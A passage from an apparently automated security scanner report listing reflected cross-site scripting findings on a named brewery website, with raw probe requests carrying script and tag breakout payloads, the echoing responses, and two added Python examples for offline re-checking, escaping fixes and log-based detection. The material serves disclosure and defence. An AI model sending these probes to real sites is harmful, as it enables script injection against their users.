User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/jsbc3d1"><script>alert(1)</script>ecfeb04c9eb/combined.css" method="post">
...[SNIP]...

1.61. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d476b"><script>alert(1)</script>a689b0522a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/combined.cssd476b"><script>alert(1)</script>a689b0522a2 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/combined.cssd476b"><script>alert(1)</script>a689b0522a2" method="post">
...[SNIP]...

1.62. http://www.ninkasibrewing.com/contact/content/js/combined.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71815"><script>alert(1)</script>1eba9a79caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/combined.css?71815"><script>alert(1)</script>1eba9a79caa=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/combined.css?71815"><script>alert(1)</script>1eba9a79caa=1" method="post">
...[SNIP]...

1.63. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb5da"><a>6d080ef4815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contactbb5da"><a>6d080ef4815/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contactbb5da"><a>6d080ef4815_page" class="contactbb5da">
...[SNIP]...
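Findings 1.59 to 1.63 above all follow one pattern: a marker string is appended to one path segment (or used as the name of a query parameter), and the response copies it verbatim into a double-quoted attribute value. The Python below is added here as a worked example; it is not part of the scanner output and not the site's code. It rebuilds the probe targets the report shows for each "REST URL parameter", locates every echo of the marker in a response body, reports which attribute the echo landed in and whether the whole payload survived, and places the vulnerable attribute rendering next to an HTML-escaped one. The response bodies are constructed from the fragments printed in the findings; the two form-rendering functions are an assumed reconstruction of what the server does, since its PHP source is not on this page. Run against the 1.63 fragment it also shows why that "Firm" finding deserves the manual follow-up the report asks for: the id attribute reflects the complete bb5da"><a>6d080ef4815 payload, while the class attribute keeps only the part before the first double quote.

```python
"""Offline re-check of the reflected XSS pattern in findings 1.59-1.63.

Added example, not part of the scanner report.  Response bodies are
constructed from the fragments shown above; the site's server code is
not on this page, so render_action() is an assumed reconstruction.
"""
import html
import re

# Same marker shape the scanner used: random prefix, attribute breakout,
# random suffix.  Only the prefix is searched for in responses.
SCRIPT_PAYLOAD = 'cb4b5"><script>alert(1)</script>1a875df3c26'
TAG_PAYLOAD = 'bb5da"><a>6d080ef4815'

# Constructed from the response fragment in finding 1.63: one input is
# echoed into two attributes of the <body> tag.
FIRM_BODY = (
    '<html xmlns="http://www.w3.org/1999/xhtml"><head></head>\n'
    '<body id="contactbb5da"><a>6d080ef4815_page" class="contactbb5da">\n'
)


def probe_targets(path, payload):
    """Return (location, request-target) pairs mirroring the scan: the payload
    appended to each path segment ("REST URL parameter n") and used as the
    name of an extra query parameter.  Sent raw, as in the report's requests."""
    trailing = "/" if path.endswith("/") and len(path) > 1 else ""
    segments = [s for s in path.split("/") if s]
    targets = []
    for i, seg in enumerate(segments):
        mutated = segments[:i] + [seg + payload] + segments[i + 1:]
        targets.append((f"REST URL parameter {i + 1}",
                        "/" + "/".join(mutated) + trailing))
    targets.append(("name of an arbitrarily supplied request parameter",
                    f"{path}?{payload}=1"))
    return targets


# Rightmost attribute whose double-quoted value is still open at a position.
_OPEN_ATTR = re.compile(r'([\w:-]+)="([^"]*)$')


def reflections(body, payload):
    """Locate every echo of the payload's random prefix and report which
    attribute value it sits in and whether the whole payload survived."""
    prefix = payload.split('"', 1)[0]
    found = []
    for m in re.finditer(re.escape(prefix), body):
        pos = m.start()
        attr = _OPEN_ATTR.search(body[:pos])
        found.append({
            "offset": pos,
            "attribute": attr.group(1) if attr else None,
            "complete": body.startswith(payload, pos),
        })
    return found


def severity(body, payload):
    """Scanner-style verdict: 'Certain' when a complete <script> payload is
    echoed, 'Firm' when only a harmless tag got through, else 'none'."""
    if not any(r["complete"] for r in reflections(body, payload)):
        return "none"
    return "Certain" if "<script>" in payload else "Firm"


def render_action(request_target):
    """Assumed vulnerable pattern implied by the responses: the request
    target copied verbatim into a double-quoted attribute."""
    return (f'<form class="form" id="contact_form" action="http://www.ninkasibrewing.com'
            f'{request_target}" method="post">')


def render_action_fixed(request_target):
    """Hardened form: HTML-escape including quotes before emitting the value
    (PHP equivalent: htmlspecialchars($v, ENT_QUOTES, 'UTF-8'))."""
    return (f'<form class="form" id="contact_form" action="http://www.ninkasibrewing.com'
            f'{html.escape(request_target, quote=True)}" method="post">')


if __name__ == "__main__":
    for where, target in probe_targets("/contact/content/js/combined.css", SCRIPT_PAYLOAD):
        print(f"{severity(render_action(target), SCRIPT_PAYLOAD):8} {where}: {target}")
    _, seg2 = probe_targets("/contact/content/js/combined.css", SCRIPT_PAYLOAD)[1]
    print("escaped:", severity(render_action_fixed(seg2), SCRIPT_PAYLOAD))
    for hit in reflections(FIRM_BODY, TAG_PAYLOAD):
        print(hit)
```

The verdict logic is deliberately as blunt as the scanner's: a payload counts only if every byte of it is echoed unchanged. Escaping with quotes turns the marker into cb4b5&quot;&gt;&lt;script&gt;..., so the attribute value is never closed early and the check reports none, which is the property the fix has to guarantee for every place the URL is echoed, not just the form action.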

1.64. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7350e"><script>alert(1)</script>c3cd6c52bb9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content7350e"><script>alert(1)</script>c3cd6c52bb9/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content7350e"><script>alert(1)</script>c3cd6c52bb9/js/combined.js" method="post">
...[SNIP]...

1.65. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e7c2"><script>alert(1)</script>abe7c99ab4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js4e7c2"><script>alert(1)</script>abe7c99ab4e/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js4e7c2"><script>alert(1)</script>abe7c99ab4e/combined.js" method="post">
...[SNIP]...

1.66. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20af2"><script>alert(1)</script>da4e655317a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/combined.js20af2"><script>alert(1)</script>da4e655317a HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/combined.js20af2"><script>alert(1)</script>da4e655317a" method="post">
...[SNIP]...

1.67. http://www.ninkasibrewing.com/contact/content/js/combined.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68dfc"><script>alert(1)</script>1139d382123 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/combined.js?68dfc"><script>alert(1)</script>1139d382123=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/combined.js?68dfc"><script>alert(1)</script>1139d382123=1" method="post">
...[SNIP]...
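The requests in 1.59 to 1.67 are exactly what a defender sees in the web server's access log, so the same probes can be caught from the log side. The Python below is an added example, not part of the report: it parses Apache combined-format lines, undoes the two encodings a logged request line can carry (percent-encoding from the client and Apache's backslash-escaping of a literal double quote), splits the target the way the report numbers it, and raises one alert per path segment or query-parameter name that contains an attribute-breakout character. The three log lines are constructed from the requests in findings 1.63 and 1.62 plus one benign request, with client addresses from documentation ranges; the assumption that legitimate paths on this site never contain quotes or angle brackets is what makes the rule sharp.

```python
"""Spotting the XSS probes above in Apache access logs.

Added example, not part of the report.  SAMPLE_LOG is constructed from the
requests in findings 1.63 and 1.62 plus one benign hit; addresses are from
documentation ranges.  Assumption: legitimate path segments and parameter
names on this site never contain quotes or angle brackets.
"""
import re
from urllib.parse import unquote

SAMPLE_LOG = r'''
203.0.113.10 - - [21/Nov/2010:21:51:02 +0000] "GET /contactbb5da%22%3E%3Ca%3E6d080ef4815/content/js/combined.js HTTP/1.1" 200 13214 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
203.0.113.10 - - [21/Nov/2010:21:50:35 +0000] "GET /contact/content/js/combined.css?71815\"><script>alert(1)</script>1eba9a79caa=1 HTTP/1.1" 200 14669 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
198.51.100.7 - - [21/Nov/2010:21:52:01 +0000] "GET /beers/?style=ipa HTTP/1.1" 200 13214 "-" "Mozilla/5.0"
'''.strip().splitlines()

# Apache combined format up to the response size; the request target has no
# spaces, so \S+ captures it whole even when it contains escaped quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# Characters that close a double-quoted attribute or open a tag.
BREAKOUT = re.compile(r'["\'<>]')


def decode_component(raw):
    """Undo Apache's \\" escaping of a literal quote, then one round of
    percent-decoding (what the PHP application itself would see)."""
    return unquote(raw.replace('\\"', '"'))


def inspect_target(target):
    """Split a request target the way the report numbers it and return the
    (location, decoded value) pairs that carry breakout characters."""
    path, _, query = target.partition("?")
    hits = []
    for i, seg in enumerate(s for s in path.split("/") if s):
        value = decode_component(seg)
        if BREAKOUT.search(value):
            hits.append((f"REST URL parameter {i + 1}", value))
    if query:
        for pair in query.split("&"):
            name = decode_component(pair.partition("=")[0])
            if BREAKOUT.search(name):
                hits.append(("name of an arbitrarily supplied request parameter", name))
    return hits


def detect(lines):
    """Run the check over access-log lines; one alert per suspicious component.
    Unparseable lines are skipped rather than raising."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for location, value in inspect_target(m["target"]):
            alerts.append({
                "ip": m["ip"],
                "time": m["time"],
                "status": int(m["status"]),
                "location": location,
                "evidence": value,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(f'{alert["time"]} {alert["ip"]} {alert["status"]} '
              f'{alert["location"]}: {alert["evidence"]}')
```

Two details matter in practice. The status code is kept in the alert because a 200, as in every response on this page, means the application served a page for the mangled path instead of a 404, which is the behaviour that makes the reflection reachable. And a <script> probe placed in a path segment, as in 1.59 to 1.61, contains a slash inside </script>, so the server and this parser both see it as two adjacent segments; the rule still fires on each of them.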

1.68. http://www.ninkasibrewing.com/content/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b52"><a>dca3b514689 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta4b52"><a>dca3b514689/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contenta4b52"><a>dca3b514689_page" class="contenta4b52">
...[SNIP]...

1.69. http://www.ninkasibrewing.com/content/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb5f9"><a>6ec3d9ffd59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentbb5f9"><a>6ec3d9ffd59/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentbb5f9"><a>6ec3d9ffd59_page" class="contentbb5f9">
...[SNIP]...

1.70. http://www.ninkasibrewing.com/content/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f696"><a>14eab4f7f64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content6f696"><a>14eab4f7f64/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content6f696"><a>14eab4f7f64_page" class="content6f696">
...[SNIP]...

1.71. http://www.ninkasibrewing.com/content/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a612"><a>155fb3b9f51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content3a612"><a>155fb3b9f51/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content3a612"><a>155fb3b9f51_page" class="content3a612">
...[SNIP]...

1.72. http://www.ninkasibrewing.com/content/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edf9b"><a>e851ee84c8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentedf9b"><a>e851ee84c8f/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentedf9b"><a>e851ee84c8f_page" class="contentedf9b">
...[SNIP]...

1.73. http://www.ninkasibrewing.com/content/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f19e"><a>5dbf816ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content6f19e"><a>5dbf816ffe/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content6f19e"><a>5dbf816ffe_page" class="content6f19e">
...[SNIP]...

1.74. http://www.ninkasibrewing.com/content/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1074f"><a>3bd48f0635 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

